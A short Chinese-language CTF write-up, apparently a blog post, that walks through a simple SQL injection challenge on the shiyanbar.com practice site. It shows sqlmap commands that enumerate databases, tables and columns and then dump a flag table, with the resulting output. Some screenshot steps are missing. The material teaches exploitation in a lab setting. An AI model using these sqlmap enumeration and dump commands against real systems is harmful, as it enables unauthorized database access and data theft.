就以实验吧上那个简单的sql注入题为例吧，不过那道题确实经典，把sqlmap的整个使用过程都展现了一遍，先奉上那道题的地址：http://ctf5.shiyanbar.com/web/index_3.php

上截图：

 

第一步：先随便输一个参数，然后开始用工具，第一句话是使用-U 参数指定URL，如果URL存在注入点，将会显示web容器，数据库版本信息，如图

第二步： 

使用 -dbs参数读取数据库，如图

第三步：

查看当前应用程序数据库

 (不能发图了，每次发图还带用鼠标，宿舍关灯了，不能打扰其他人)

第四步：sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --table -D "web1"

Database: web1

[2 tables]

+-------+

| flag |

| web_1 |

+-------+

列出指定数据库的所有表 （使用--table 参数获取数据库表，-D参数指定数据库）

第五步：sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag" -D "web1"

Database: web1

Table: flag

[2 columns]

+--------+----------+

| Column | Type |

+--------+----------+

| flag | char(30) |

| id | int(4) |

+--------+----------+

读取指定表单字段名称 使用--columns参数咧取字段名

第六步： sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dump -C "flag" -T "flag" -D "web1"

Database: web1

Table: flag

[1 entry]

+----------------------------+

| flag |

+----------------------------+

| flag{Y0u_@r3_5O_dAmn_90Od} |

+----------------------------+

读取指定字段内容 --dump 参数以为转存数据，-C参数指定字段名称，-T指定表明 ，-D参数指定数据库名称

学会sqlmap套路，得到flag!